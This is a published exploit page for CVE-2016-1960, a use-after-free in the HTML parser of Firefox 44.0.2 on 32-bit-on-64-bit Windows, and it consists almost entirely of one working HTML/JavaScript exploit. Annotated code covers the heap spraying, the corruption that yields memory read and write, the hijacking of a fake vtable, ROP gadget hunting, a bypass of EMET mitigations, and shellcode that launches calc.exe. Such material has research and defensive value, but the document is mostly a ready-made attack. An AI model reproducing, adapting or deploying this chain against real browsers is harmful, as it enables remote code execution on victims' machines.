Mozilla Firefox nsHtml5TreeBuilder Use-After-Free
Posted on 22 August 2017
<!doctype html> <html> <head> <meta http-equiv="cache-control" content="no-cache" charset="utf-8" /> <title>CVE-2016-1960</title> <script> /* * Exploit Title: Mozilla Firefox < 45.0 nsHtml5TreeBuilder Array Indexing Vulnerability (EMET 5.52 bypass) * Author: Hans Jerry Illikainen (exploit), ca0nguyen (vulnerability) * Vendor Homepage: https://mozilla.org * Software Link: https://ftp.mozilla.org/pub/firefox/releases/44.0.2/win32/en-US/ * Version: 44.0.2 * Tested on: Windows 7 and Windows 10 * CVE: CVE-2016-1960 * * Exploit for CVE-2016-1960 [1] targeting Firefox 44.0.2 [2] on WoW64 * with/without EMET 5.52. * * Tested on: * - 64bit Windows 10 Pro+Home (version 1703) * - 64bit Windows 7 Pro SP1 * * Vulnerability disclosed by ca0nguyen [1]. * Exploit written by Hans Jerry Illikainen <hji@dyntopia.com>. * * [1] https://bugzilla.mozilla.org/show_bug.cgi?id=1246014 * [2] https://ftp.mozilla.org/pub/firefox/releases/44.0.2/win32/en-US/ */ "use strict"; /* This is executed after having pivoted the stack. `esp' points to a * region on the heap, and the original stack pointer is stored in * `edi'. In order to bypass EMET, the shellcode should make sure to * xchg edi, esp before any protected function is called. * * For convenience, the first two "arguments" to the shellcode is a * module handle for kernel32.dll and the address of GetProcAddress() */ const shellcode = [ "x8bx84x24x04x00x00x00", /* mov eax, dword [esp + 0x4] */ "x8bx8cx24x08x00x00x00", /* mov ecx, dword [esp + 0x8] */ "x87xe7", /* xchg edi, esp */ "x56", /* push esi */ "x57", /* push edi */ "x89xc6", /* mov esi, eax */ "x89xcf", /* mov edi, ecx */ "x68x78x65x63x00", /* push xec� */ "x68x57x69x6ex45", /* push WinE */ "x54", /* push esp */ "x56", /* push esi */ "xffxd7", /* call edi */ "x83xc4x08", /* add esp, 0x8 */ "x6ax00", /* push 0 */ "x68x2ex65x78x65", /* push .exe */ "x68x63x61x6cx63", /* push calc */ "x89xe1", /* mov ecx, esp */ "x6ax01", /* push 1 */ "x51", /* push ecx */ "xffxd0", /* call eax */ "x83xc4x0c", /* add esp, 0xc */ "x5f", /* pop edi */ "x5e", /* pop esi */ "x87xe7", /* xchg edi, esp */ "xc3", /* ret */ ]; function ROPHelper(pe, rwx) { this.pe = pe; this.rwx = rwx; this.cache = {}; this.search = function(instructions) { for (let addr in this.cache) { if (this.match(this.cache[addr], instructions) === true) { return addr; } } const text = this.pe.text; for (let addr = text.base; addr < text.base + text.size; addr++) { const read = this.rwx.readBytes(addr, instructions.length); if (this.match(instructions, read) === true) { this.cache[addr] = instructions; return addr; } } throw new Error("could not find gadgets for " + instructions); }; this.match = function(a, b) { if (a.length !== b.length) { return false; } for (let i = 0; i < a.length; i++) { if (a[i] !== b[i]) { return false; } } return true; }; this.execute = function(func, args, cleanup) { const u32array = this.rwx.u32array; const ret = this.rwx.calloc(4); let i = this.rwx.div.mem.idx + 2941; /* gadgets after [A] and [B] */ /* * [A] stack pivot * * xchg eax, esp * ret 0x2de8 */ const pivot = this.search([0x94, 0xc2, 0xe8, 0x2d]); /* * [B] preserve old esp in a nonvolatile register * * xchg eax, edi * ret */ const after = this.search([0x97, 0xc3]); /* * [C] address to execute */ u32array[i++] = func; if (cleanup === true && args.length > 0) { if (args.length > 1) { /* * [E] return address from [C]: cleanup args on the stack * * add esp, args.length*4 * ret */ u32array[i++] = this.search([0x83, 0xc4, args.length*4, 0xc3]); } else { /* * [E] return address from [C]: cleanup arg * * pop ecx * ret */ u32array[i++] = this.search([0x59, 0xc3]); } } else { /* * [E] return address from [C] * * ret */ u32array[i++] = this.search([0xc3]); } /* * [D] arguments for [C] */ for (let j = 0; j < args.length; j++) { u32array[i++] = args[j]; } /* * [F] pop the location for the return value * * pop ecx * ret */ u32array[i++] = this.search([0x59, 0xc3]); /* * [G] address to store the return value */ u32array[i++] = ret.addr; /* * [H] move the return value to [G] * * mov dword [ecx], eax * ret */ u32array[i++] = this.search([0x89, 0x01, 0xc3]); /* * [I] restore the original esp and return * * mov esp, edi * ret */ u32array[i++] = this.search([0x89, 0xfc, 0xc3]); this.rwx.execute(pivot, after); return u32array[ret.idx]; }; } function ICUUC55(rop, pe, rwx) { this.rop = rop; this.pe = pe; this.rwx = rwx; this.kernel32 = new KERNEL32(rop, pe, rwx); this.icuuc55handle = this.kernel32.GetModuleHandleA("icuuc55.dll"); /* * The invocation of uprv_malloc_55() requires special care since * pAlloc points to a protected function (VirtualAlloc). * * ROPHelper.execute() can't be used because: * 1. it pivots the stack to the heap (StackPivot protection) * 2. it returns into the specified function (Caller protection) * 3. the forward ROP chain is based on returns (SimExecFlow protection) * * This function consist of several steps: * 1. a second-stage ROP chain is written to the stack * 2. a first-stage ROP chain is executed that pivots to the heap * 3. the first-stage ROP chain continues by pivoting to #1 * 4. uprv_malloc_55() is invoked * 5. the return value is saved * 6. the original stack is restored * * Of note is that uprv_malloc_55() only takes a `size' argument, * and it passes two arguments to the hijacked pAlloc function * pointer (context and size; both in our control). VirtualAlloc, * on the other hand, expects four arguments. So, we'll have to * setup the stack so that the values interpreted by VirtualAlloc as * its arguments are reasonably-looking. * * By the time that uprv_malloc_55() is returned into, the stack * will look like: * [A] [B] [C] [D] * * When pAlloc is entered, the stack will look like: * [uprv_malloc_55()-ret] [pContext] [B] [A] [B] [C] [D] * * Since we've set pAlloc to point at VirtualAlloc, the call is * interpreted as VirtualAlloc(pContext, B, A, B); * * Hence, because we want `flProtect' to be PAGE_EXECUTE_READWRITE, * we also have to have a `size' with the same value; meaning our * rwx allocation will only be 0x40 bytes. * * This is not a problem, since we can simply write a small snippet * of shellcode that allocates a larger region in a non-ROPy way * afterwards. */ this.uprv_malloc_55 = function(stackAddr) { const func = this.kernel32.GetProcAddress(this.icuuc55handle, "uprv_malloc_55"); const ret = this.rwx.calloc(4); const u32array = this.rwx.u32array; /********************** * second stage gadgets **********************/ const stackGadgets = new Array( func, 0x1000, /* [A] flAllocationType (MEM_COMMIT) */ 0x40, /* [B] dwSize and flProtect (PAGE_EXECUTE_READWRITE) */ 0x41414141, /* [C] */ 0x42424242, /* [D] */ /* * location to write the return value * * pop ecx * ret */ this.rop.search([0x59, 0xc3]), ret.addr, /* * do the write * * mov dword [ecx], eax * ret */ this.rop.search([0x89, 0x01, 0xc3]), /* * restore the old stack * * mov esp, edi * ret */ this.rop.search([0x89, 0xfc, 0xc3]) ); const origStack = this.rwx.readDWords(stackAddr, stackGadgets.length); this.rwx.writeDWords(stackAddr, stackGadgets); /********************* * first stage gadgets *********************/ /* * pivot * * xchg eax, esp * ret 0x2de8 */ const pivot = this.rop.search([0x94, 0xc2, 0xe8, 0x2d]); /* * preserve old esp in a nonvolatile register * * xchg eax, edi * ret */ const after = this.rop.search([0x97, 0xc3]); /* * pivot to the second stage * * pop esp * ret */ u32array[this.rwx.div.mem.idx + 2941] = this.rop.search([0x5c, 0xc3]); u32array[this.rwx.div.mem.idx + 2942] = stackAddr; /* * here we go :) */ this.rwx.execute(pivot, after); this.rwx.writeDWords(stackAddr, origStack); if (u32array[ret.idx] === 0) { throw new Error("uprv_malloc_55() failed"); } return u32array[ret.idx]; }; /* * Overrides the pointers in firefox-44.0.2/intl/icu/source/common/cmemory.c */ this.u_setMemoryFunctions_55 = function(context, a, r, f, status) { const func = this.kernel32.GetProcAddress(this.icuuc55handle, "u_setMemoryFunctions_55"); this.rop.execute(func, [context, a, r, f, status], true); }; /* * Sets `pAlloc' to VirtualAlloc. `pRealloc' and `pFree' are * set to point to small gadgets. */ this.set = function() { const status = this.rwx.calloc(4); const alloc = this.pe.search("kernel32.dll", "VirtualAlloc"); /* pretend to be a failed reallocation * * xor eax, eax * ret */ const realloc = this.rop.search([0x33, 0xc0, 0xc3]); /* let the chunk live * * ret */ const free = this.rop.search([0xc3]); this.u_setMemoryFunctions_55(0, alloc, realloc, free, status.addr); if (this.rwx.u32array[status.idx] !== 0) { throw new Error("u_setMemoryFunctions_55() failed"); } }; /* * This (sort of) restores the functionality in * intl/icu/source/common/cmemory.c by reusing the previously * allocated PAGE_EXECUTE_READWRITE chunk to set up three stubs that * invokes an appropriate function in mozglue.dll */ this.reset = function(chunk) { const u32array = this.rwx.u32array; const status = this.rwx.calloc(4); /* * pFree */ const free = {}; free.addr = chunk; free.func = this.rwx.calloc(4); free.func.str = this.dword2str(free.func.addr); free.code = [ "x8bx84x24x08x00x00x00", /* mov eax, dword [esp + 0x8] */ "x50", /* push eax */ "x8bx05" + free.func.str, /* mov eax, [location-of-free] */ "xffxd0", /* call eax */ "x59", /* pop ecx */ "xc3", /* ret */ ].join(""); u32array[free.func.idx] = this.pe.search("mozglue.dll", "free"); this.rwx.writeString(free.addr, free.code); /* * pAlloc */ const alloc = {}; alloc.addr = chunk + free.code.length; alloc.func = this.rwx.calloc(4); alloc.func.str = this.dword2str(alloc.func.addr); alloc.code = [ "x8bx84x24x08x00x00x00", /* mov eax, dword [esp + 0x8] */ "x50", /* push eax */ "x8bx05" + alloc.func.str, /* mov eax, [location-of-alloc] */ "xffxd0", /* call eax */ "x59", /* pop ecx */ "xc3", /* ret */ ].join(""); u32array[alloc.func.idx] = this.pe.search("mozglue.dll", "malloc"); this.rwx.writeString(alloc.addr, alloc.code); /* * pRealloc */ const realloc = {}; realloc.addr = chunk + free.code.length + alloc.code.length; realloc.func = this.rwx.calloc(4); realloc.func.str = this.dword2str(realloc.func.addr); realloc.code = [ "x8bx84x24x0cx00x00x00", /* mov eax, dword [esp + 0xc] */ "x50", /* push eax */ "x8bx84x24x0cx00x00x00", /* mov eax, dword [esp + 0xc] */ "x50", /* push eax */ "x8bx05" + realloc.func.str, /* mov eax, [location-of-realloc] */ "xffxd0", /* call eax */ "x59", /* pop ecx */ "x59", /* pop ecx */ "xc3", /* ret */ ].join(""); u32array[realloc.func.idx] = this.pe.search("mozglue.dll", "realloc"); this.rwx.writeString(realloc.addr, realloc.code); this.u_setMemoryFunctions_55(0, alloc.addr, realloc.addr, free.addr, status.addr); if (u32array[status.idx] !== 0) { throw new Error("u_setMemoryFunctions_55() failed"); } }; /* * Allocates a small chunk of memory marked RWX, which is used * to allocate a `size'-byte chunk (see uprv_malloc_55()). The * first allocation is then repurposed in reset(). */ this.alloc = function(stackAddr, size) { /* * hijack the function pointers */ this.set(); /* * do the initial 0x40 byte allocation */ const chunk = this.uprv_malloc_55(stackAddr); log("allocated 0x40 byte chunk at 0x" + chunk.toString(16)); /* * allocate a larger chunk now that we're no longer limited to ROP/JOP */ const u32array = this.rwx.u32array; const func = this.rwx.calloc(4); func.str = this.dword2str(func.addr); u32array[func.idx] = this.pe.search("kernel32.dll", "VirtualAlloc"); const code = [ "x87xe7", /* xchg edi, esp (orig stack) */ "x6ax40", /* push 0x40 (flProtect) */ "x68x00x10x00x00", /* push 0x1000 (flAllocationType) */ "xb8" + this.dword2str(size), /* move eax, size */ "x50", /* push eax (dwSize) */ "x6ax00", /* push 0 (lpAddress) */ "x8bx05" + func.str, /* mov eax, [loc-of-VirtualAlloc] */ "xffxd0", /* call eax */ "x87xe7", /* xchg edi, esp (back to heap) */ "xc3", /* ret */ ].join(""); this.rwx.writeString(chunk, code); const newChunk = this.rop.execute(chunk, [], false); log("allocated " + size + " byte chunk at 0x" + newChunk.toString(16)); /* * repurpose the first rwx chunk to restore functionality */ this.reset(chunk); return newChunk; }; this.dword2str = function(dword) { let str = ""; for (let i = 0; i < 4; i++) { str += String.fromCharCode((dword >> 8 * i) & 0xff); } return str; }; } function KERNEL32(rop, pe, rwx) { this.rop = rop; this.pe = pe; this.rwx = rwx; /* * Retrieves a handle for an imported module */ this.GetModuleHandleA = function(lpModuleName) { const func = this.pe.search("kernel32.dll", "GetModuleHandleA"); const name = this.rwx.copyString(lpModuleName); const module = this.rop.execute(func, [name.addr], false); if (module === 0) { throw new Error("could not get a handle for " + lpModuleName); } return module; }; /* * Retrieves the address of an exported symbol. Do not invoke this * function on protected modules (if you want to bypass EAF); instead * try to locate the symbol in any of the import tables or choose * another target. */ this.GetProcAddress = function(hModule, lpProcName) { const func = this.pe.search("kernel32.dll", "GetProcAddress"); const name = this.rwx.copyString(lpProcName); const addr = this.rop.execute(func, [hModule, name.addr], false); if (addr === 0) { throw new Error("could not get address for " + lpProcName); } return addr; }; /* * Retrieves a handle for the current thread */ this.GetCurrentThread = function() { const func = this.pe.search("kernel32.dll", "GetCurrentThread"); return this.rop.execute(func, [], false); }; } function NTDLL(rop, pe, rwx) { this.rop = rop; this.pe = pe; this.rwx = rwx; /* * Retrieves the stack limit from the Thread Environment Block */ this.getStackLimit = function(ThreadHandle) { const mem = this.rwx.calloc(0x1c); this.NtQueryInformationThread(ThreadHandle, 0, mem.addr, mem.size, 0); return this.rwx.readDWord(this.rwx.u32array[mem.idx+1] + 8); }; /* * Retrieves thread information */ this.NtQueryInformationThread = function(ThreadHandle, ThreadInformationClass, ThreadInformation, ThreadInformationLength, ReturnLength) { const func = this.pe.search("ntdll.dll", "NtQueryInformationThread"); const ret = this.rop.execute(func, arguments, false); if (ret !== 0) { throw new Error("NtQueryInformationThread failed"); } return ret; }; } function ReadWriteExecute(u32base, u32array, array) { this.u32base = u32base; this.u32array = u32array; this.array = array; /* * Reads `length' bytes from `addr' through a fake string */ this.readBytes = function(addr, length) { /* create a string-jsval */ this.u32array[4] = this.u32base + 6*4; /* addr to meta */ this.u32array[5] = 0xffffff85; /* type (JSVAL_TAG_STRING) */ /* metadata */ this.u32array[6] = 0x49; /* flags */ this.u32array[7] = length; /* read size */ this.u32array[8] = addr; /* memory to read */ /* Uint8Array is *significantly* slower, which kills our ROP hunting */ const result = new Array(); const str = this.getArrayElem(4); for (let i = 0; i < str.length; i++) { result[i] = str.charCodeAt(i); } return result; }; this.readDWords = function(addr, num) { const bytes = this.readBytes(addr, num * 4); const dwords = new Uint32Array(num); for (let i = 0; i < bytes.length; i += 4) { for (let j = 0; j < 4; j++) { dwords[i/4] |= bytes[i+j] << (8 * j); } } return dwords; }; this.readDWord = function(addr) { return this.readDWords(addr, 1)[0]; }; this.readWords = function(addr, num) { const bytes = this.readBytes(addr, num * 2); const words = new Uint16Array(num); for (let i = 0; i < bytes.length; i += 2) { for (let j = 0; j < 2; j++) { words[i/2] |= bytes[i+j] << (8 * j); } } return words; }; this.readWord = function(addr) { return this.readWords(addr, 1)[0]; }; this.readString = function(addr) { for (let i = 0, str = ""; ; i++) { const chr = this.readBytes(addr + i, 1)[0]; if (chr === 0) { return str; } str += String.fromCharCode(chr); } }; /* * Writes `values' to `addr' by using the metadata of an Uint8Array * to set up a write primitive */ this.writeBytes = function(addr, values) { /* create jsval */ const jsMem = this.calloc(8); this.setArrayElem(jsMem.idx, new Uint8Array(values.length)); /* copy metadata */ const meta = this.readDWords(this.u32array[jsMem.idx], 12); const metaMem = this.calloc(meta.length * 4); for (let i = 0; i < meta.length; i++) { this.u32array[metaMem.idx + i] = meta[i]; } /* change the pointer to the contents of the Uint8Array */ this.u32array[metaMem.idx + 10] = addr; /* change the pointer to the metadata */ const oldMeta = this.u32array[jsMem.idx]; this.u32array[jsMem.idx] = metaMem.addr; /* write */ const u8 = this.getArrayElem(jsMem.idx); for (let i = 0; i < values.length; i++) { u8[i] = values[i]; } /* clean up */ this.u32array[jsMem.idx] = oldMeta; }; this.writeDWords = function(addr, values) { const u8 = new Uint8Array(values.length * 4); for (let i = 0; i < values.length; i++) { for (let j = 0; j < 4; j++) { u8[i*4 + j] = values[i] >> (8 * j) & 0xff; } } this.writeBytes(addr, u8); }; this.writeDWord = function(addr, value) { const u32 = new Uint32Array(1); u32[0] = value; this.writeDWords(addr, u32); }; this.writeString = function(addr, str) { const u8 = new Uint8Array(str.length); for (let i = 0; i < str.length; i++) { u8[i] = str.charCodeAt(i); } this.writeBytes(addr, u8); }; /* * Copies a string to the `u32array' and returns an object from * calloc(). * * This is an ugly workaround to allow placing a string at a known * location without having to implement proper support for JSString * and its various string types. */ this.copyString = function(str) { str += "x00".repeat(4 - str.length % 4); const mem = this.calloc(str.length); for (let i = 0, j = 0; i < str.length; i++) { if (i && !(i % 4)) { j++; } this.u32array[mem.idx + j] |= str.charCodeAt(i) << (8 * (i % 4)); } return mem; }; /* * Creates a <div> and copies the contents of its vftable to * writable memory. */ this.createExecuteDiv = function() { const div = {}; /* 0x3000 bytes should be enough for the div, vftable and gadgets */ div.mem = this.calloc(0x3000); div.elem = document.createElement("div"); this.setArrayElem(div.mem.idx, div.elem); /* addr of the div */ const addr = this.u32array[div.mem.idx]; /* *(addr+4) = this */ const ths = this.readDWord(addr + 4*4); /* *this = xul!mozilla::dom::HTMLDivElement::`vftable' */ const vftable = this.readDWord(ths); /* copy the vftable (the size is a guesstimate) */ const entries = this.readDWords(vftable, 512); this.writeDWords(div.mem.addr + 4*2, entries); /* replace the pointer to the original vftable with ours */ this.writeDWord(ths, div.mem.addr + 4*2); return div; }; /* * Replaces two vftable entries of the previously created div and * triggers code execution */ this.execute = function(pivot, postPivot) { /* vftable entry for xul!nsGenericHTMLElement::QueryInterface * kind of ugly, but we'll land here after the pivot that's used * in ROPHelper.execute() */ const savedQueryInterface = this.u32array[this.div.mem.idx + 2]; this.u32array[this.div.mem.idx + 2] = postPivot; /* vftable entry for xul!nsGenericHTMLElement::Click */ const savedClick = this.u32array[this.div.mem.idx + 131]; this.u32array[this.div.mem.idx + 131] = pivot; /* execute */ this.div.elem.click(); /* restore our overwritten vftable pointers */ this.u32array[this.div.mem.idx + 2] = savedQueryInterface; this.u32array[this.div.mem.idx + 131] = savedClick; }; /* * Reserves space in the `u32array' and initializes it to 0. * * Returns an object with the following properties: * - idx: index of the start of the allocation in the u32array * - addr: start address of the allocation * - size: non-padded allocation size * - realSize: padded size */ this.calloc = function(size) { let padded = size; if (!size || size % 4) { padded += 4 - size % 4; } const found = []; /* the first few dwords are reserved for the metadata belonging * to `this.array' and for the JSString in readBytes (since using * this function would impact the speed of the ROP hunting) */ for (let i = 10; i < this.u32array.length - 1; i += 2) { if (this.u32array[i] === 0x11223344 && this.u32array[i+1] === 0x55667788) { found.push(i, i+1); if (found.length >= padded / 4) { for (let j = 0; j < found.length; j++) { this.u32array[found[j]] = 0; } return { idx: found[0], addr: this.u32base + found[0]*4, size: size, realSize: padded, }; } } else { found.length = 0; } } throw new Error("calloc(): out of memory"); }; /* * Returns an element in `array' based on an index for `u32array' */ this.getArrayElem = function(idx) { if (idx <= 3 || idx % 2) { throw new Error("invalid index"); } return this.array[(idx - 4) / 2]; }; /* * Sets an element in `array' based on an index for `u32array' */ this.setArrayElem = function(idx, value) { if (idx <= 3 || idx % 2) { throw new Error("invalid index"); } this.array[(idx - 4) / 2] = value; }; this.div = this.createExecuteDiv(); } function PortableExecutable(base, rwx) { this.base = base; this.rwx = rwx; this.imports = {}; this.text = {}; /* * Parses the PE import table. Some resources of interest: * * - An In-Depth Look into the Win32 Portable Executable File Format * https://msdn.microsoft.com/en-us/magazine/bb985992(printer).aspx * * - Microsoft Portable Executable and Common Object File Format Specification * https://www.microsoft.com/en-us/download/details.aspx?id=19509 * * - Understanding the Import Address Table * http://sandsprite.com/CodeStuff/Understanding_imports.html */ this.read = function() { const rwx = this.rwx; let addr = this.base; /* * DOS header */ const magic = rwx.readWord(addr); if (magic !== 0x5a4d) { throw new Error("bad DOS header"); } const lfanew = rwx.readDWord(addr + 0x3c, 4); addr += lfanew; /* * Signature */ const signature = rwx.readDWord(addr); if (signature !== 0x00004550) { throw new Error("bad signature"); } addr += 4; /* * COFF File Header */ addr += 20; /* * Optional Header */ const optionalMagic = rwx.readWord(addr); if (optionalMagic !== 0x010b) { throw new Error("bad optional header"); } this.text.size = rwx.readDWord(addr + 4); this.text.base = this.base + rwx.readDWord(addr + 20); const numberOfRvaAndSizes = rwx.readDWord(addr + 92); addr += 96; /* * Optional Header Data Directories * * N entries * 2 DWORDs (RVA and size) */ const directories = rwx.readDWords(addr, numberOfRvaAndSizes * 2); for (let i = 0; i < directories[3] - 5*4; i += 5*4) { /* Import Directory Table (N entries * 5 DWORDs) */ const members = rwx.readDWords(this.base + directories[2] + i, 5); const lookupTable = this.base + members[0]; const dllName = rwx.readString(this.base+members[3]).toLowerCase(); const addrTable = this.base + members[4]; this.imports[dllName] = {}; /* Import Lookup Table */ for (let j = 0; ; j += 4) { const hintNameRva = rwx.readDWord(lookupTable + j); /* the last entry is NULL */ if (hintNameRva === 0) { break; } /* name is not available if the dll is imported by ordinal */ if (hintNameRva & (1 << 31)) { continue; } const importName = rwx.readString(this.base + hintNameRva + 2); const importAddr = rwx.readDWord(addrTable + j); this.imports[dllName][importName] = importAddr; } } }; /* * Searches for an imported symbol */ this.search = function(dll, symbol) { if (this.imports[dll] === undefined) { throw new Error("unknown dll: " + dll); } const addr = this.imports[dll][symbol]; if (addr === undefined) { throw new Error("unknown symbol: " + symbol); } return addr; }; } function Spray() { this.nodeBase = 0x80000000; this.ptrNum = 64; this.refcount = 0xffffffff; /* * 0:005> ?? sizeof(nsHtml5StackNode) * unsigned int 0x1c */ this.nsHtml5StackNodeSize = 0x1c; /* * Creates a bunch of fake nsHtml5StackNode:s with the hope of hitting * the address of elementName->name when it's [xul!nsHtml5Atoms::style]. * * Ultimately, the goal is to enter the conditional on line 2743: * * firefox-44.0.2/parser/html/nsHtml5TreeBuilder.cpp:2743 * ,---- * | 2214 void * | 2215 nsHtml5TreeBuilder::endTag(nsHtml5ElementName* elementName) * | 2216 { * | .... * | 2221 nsIAtom* name = elementName->name; * | .... * | 2741 for (; ; ) { * | 2742 nsHtml5StackNode* node = stack[eltPos]; * | 2743 if (node->ns == kNameSpaceID_XHTML && node->name == name) { * | .... * | 2748 while (currentPtr >= eltPos) { * | 2749 pop(); * | 2750 } * | 2751 NS_HTML5_BREAK(endtagloop); * | 2752 } else if (node->isSpecial()) { * | 2753 errStrayEndTag(name); * | 2754 NS_HTML5_BREAK(endtagloop); * | 2755 } * | 2756 eltPos--; * | 2757 } * | .... * | 3035 } * `---- * * We get 64 attempts each time the bug is triggered -- however, in * order to have a clean break, the last node has its flags set to * NS_HTML5ELEMENT_NAME_SPECIAL, so that the conditional on line * 2752 is entered. * * If we do find ourselves with a node->name == name, then * nsHtml5TreeBuilder::pop() invokes nsHtml5StackNode::release(). * The release() method decrements the nodes refcount -- and, if the * refcount reaches 0, also deletes it. * * Assuming everything goes well, the Uint32Array is allocated with * the method presented by SkyLined/@berendjanwever in: * * "Heap spraying high addresses in 32-bit Chrome/Firefox on 64-bit Windows" * http://blog.skylined.nl/20160622001.html */ this.nodes = function(name, bruteforce) { const nodes = new Uint32Array(0x19000000); const size = this.nsHtml5StackNodeSize / 4; const refcount = bruteforce ? this.refcount : 1; let flags = 0; for (let i = 0; i < this.ptrNum * size; i += size) { if (i === (this.ptrNum - 1) * size) { flags = 1 << 29; /* NS_HTML5ELEMENT_NAME_SPECIAL */ name = 0x0; } nodes[i] = flags; nodes[i+1] = name; nodes[i+2] = 0; /* popName */ nodes[i+3] = 3; /* ns (kNameSpaceID_XHTML) */ nodes[i+4] = 0; /* node */ nodes[i+5] = 0; /* attributes */ nodes[i+6] = refcount; name += 0x100000; } return nodes; }; /* * Sprays pointers to the fake nsHtml5StackNode:s created in nodes() */ this.pointers = function() { const pointers = new Array(); for (let i = 0; i < 0x30000; i++) { pointers[i] = new Uint32Array(this.ptrNum); let node = this.nodeBase; for (let j = pointers[i].length - 1; j >= 0; j--) { pointers[i][j] = node; node += this.nsHtml5StackNodeSize; } } return pointers; }; /* * Sprays a bunch of arrays with the goal of having one hijack the * previously freed Uint32Array */ this.arrays = function() { const array = new Array(); for (let i = 0; i < 0x800; i++) { array[i] = new Array(); for (let j = 0; j < 0x10000; j++) { /* 0x11223344, 0x55667788 */ array[i][j] = 2.5160082934009793e+103; } } return array; }; /* * Not sure how reliable this is, but on 3 machines running win10 on * bare metal and on a few VMs with win7/win10 (all with and without * EMET), [xul!nsHtml5Atoms::style] was always found within * 0x[00a-1c2]f[a-f]6(c|e)0 */ this.getNextAddr = function(current) { const start = 0x00afa6c0; if (!current) { return start; } if ((current >> 20) < 0x150) { return current + 0x100000*(this.ptrNum-1); } if ((current >> 12 & 0xf) !== 0xf) { return (current + 0x1000) & ~(0xfff << 20) | (start >> 20) << 20; } if ((current >> 4 & 0xf) === 0xc) { return start + 0x20; } throw new Error("out of guesses"); }; /* * Returns the `name' from the last node with a decremented * refcount, if any are found */ this.findStyleAddr = function(nodes) { const size = this.nsHtml5StackNodeSize / 4; for (let i = 64 * size - 1; i >= 0; i -= size) { if (nodes[i] === this.refcount - 1) { return nodes[i-5]; } } }; /* * Locates a subarray in `array' that overlaps with `nodes' */ this.findArray = function(nodes, array) { /* index 0..3 is metadata for `array' */ nodes[4] = 0x41414141; nodes[5] = 0x42424242; for (let i = 0; i < array.length; i++) { if (array[i][0] === 156842099330.5098) { return array[i]; } } throw new Error("Uint32Array hijack failed"); }; } function log(msg) { dump("=> " + msg + " "); console.log("=> " + msg); } let nodes; let hijacked; window.onload = function() { if (!navigator.userAgent.match(/Windows NT [0-9.]+; WOW64; rv:44.0/)) { throw new Error("unsupported user-agent"); } const spray = new Spray(); /* * spray nodes */ let bruteforce = true; let addr = spray.getNextAddr(0); const href = window.location.href.split("?"); if (href.length === 2) { const query = href[1].split("="); if (query[0] === "style") { bruteforce = false; } addr = parseInt(query[1]); } nodes = spray.nodes(addr, bruteforce); /* * spray node pointers and trigger the bug */ document.body.innerHTML = "<svg><img id='AAAA'>"; const pointers = spray.pointers(); document.getElementById("AAAA").innerHTML = "<title><template><td><tr><title><i></tr><style>td</style>"; /* * on to the next run... */ if (bruteforce === true) { const style = spray.findStyleAddr(nodes); nodes = null; if (style) { window.location = href[0] + "?style=" + style; } else { window.location = href[0] + "?continue=" + spray.getNextAddr(addr); } return; } /* * reallocate the freed Uint32Array */ hijacked = spray.findArray(nodes, spray.arrays()); /* * setup helpers */ const rwx = new ReadWriteExecute(spray.nodeBase, nodes, hijacked); /* The first 4 bytes of the previously leaked [xul!nsHtml5Atoms::style] * contain the address of xul!PermanentAtomImpl::`vftable'. * * Note that the subtracted offset is specific to firefox 44.0.2. * However, since we can read arbitrary memory by this point, the * base of xul could easily (albeit perhaps somewhat slowly) be * located by searching for a PE signature */ const xulBase = rwx.readDWord(addr) - 0x1c1f834; log("style found at 0x" + addr.toString(16)); log("xul.dll found at 0x" + xulBase.toString(16)); const xulPE = new PortableExecutable(xulBase, rwx); xulPE.read(); const rop = new ROPHelper(xulPE, rwx); const kernel32 = new KERNEL32(rop, xulPE, rwx); const kernel32handle = kernel32.GetModuleHandleA("kernel32.dll"); const kernel32PE = new PortableExecutable(kernel32handle, rwx); kernel32PE.read(); const ntdll = new NTDLL(rop, kernel32PE, rwx); const icuuc55 = new ICUUC55(rop, xulPE, rwx); /* * execute shellcode */ const stack = ntdll.getStackLimit(kernel32.GetCurrentThread()); const exec = icuuc55.alloc(stack, shellcode.length); const proc = xulPE.search("kernel32.dll", "GetProcAddress"); rwx.writeString(exec, shellcode.join("")); rop.execute(exec, [kernel32handle, proc], true); }; </script> </head> </html>
